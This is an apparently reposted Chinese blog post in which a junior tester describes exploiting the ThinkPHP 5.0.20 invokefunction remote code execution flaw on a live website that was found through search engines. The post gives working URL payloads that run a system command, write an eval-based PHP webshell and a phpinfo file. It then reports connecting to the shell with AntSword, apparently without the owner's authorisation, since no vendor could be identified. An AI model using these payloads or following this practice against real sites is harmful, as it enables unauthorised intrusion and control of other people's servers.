thinkPHP5.0.20的漏洞復現


上級要求每天找三個漏洞,本人太菜,只能看漏洞庫,各種百度找站來搞。本來想找SQL注入的站,於是fofa找header="admin.php",奈何找不到,倒是看到很多站顯示Copyright H-UI ADMIN啥的,於是在百度上試試搜索Copyright H-UI ADMIN,無意間發現一個這樣的站:

 

 

發現不存在注入,問了大佬,大佬試了下,說是thinkPHP框架,於是百度thinkPHP相關漏洞,找到一些驗證的POC,嘗試:

/index.php/index/index/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir

 

 

 

是thinkPHP5.0.20:

 

 

 

大佬說這個版本的可以getshell,讓我們嘗試getshell,但需要繞過限制啥的。但是我太菜了,只有百度各種thinkPHP5.0.20的getshell,找到一個:

/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=test.php&vars[1][]=<?php highlight_file(__FILE__);@eval($_POST[sss]);?>

直接添加到網站后訪問:

返回了個數字:

 

 

 

 

 

 

 

 

 

 

然后以為是錯的,然后沒再繼續了。。。。。

后面請教了同事,同事說,是訪問寫入的文件:/test.php

於是再次嘗試訪問,可能是網絡原因,或者IP被封了,並沒有訪問到,用蟻劍也連接不上:

 

 

 

 

 

 

 

 

 

 

 

以為寫入失敗了,請教了大佬,大佬說,看PHP執行系統命令的函數有哪些,於是又各種百度,無果。。。。

PHP命令執行函數參考鏈接:

https://mrxn.net/hacktools/618.html
https://blog.csdn.net/weixin_37557729/article/details/107012128?utm_term=php%E6%9F%A5%E7%9C%8B%E7%A6%81%E6%AD%A2%E7%9A%84%E5%87%BD%E6%95%B0&utm_medium=distribute.pc_aggpage_search_result.none-task-blog-2~all~sobaiduweb~default-1-107012128&spm=3001.4430
https://blog.csdn.net/qq15577969/article/details/108994794
https://blog.csdn.net/whatday/article/details/106985758
https://blog.csdn.net/weixin_33815613/article/details/93028960

 

由於急於交漏洞,想着能證明phpinfo的應該也行:

/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=test3.php&vars[1][]=<?php phpinfo();?>

 

 

 

就准備查詢域名的相關廠商信息,然后提交漏洞,然而搜不到廠商信息,於是只好去找其他的站了。。。。

不過,第二天再次去嘗試用蟻劍連接時,結果成功了:

 

 

 

第二天連的時候,有使用代理,所以猜測是網絡問題。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM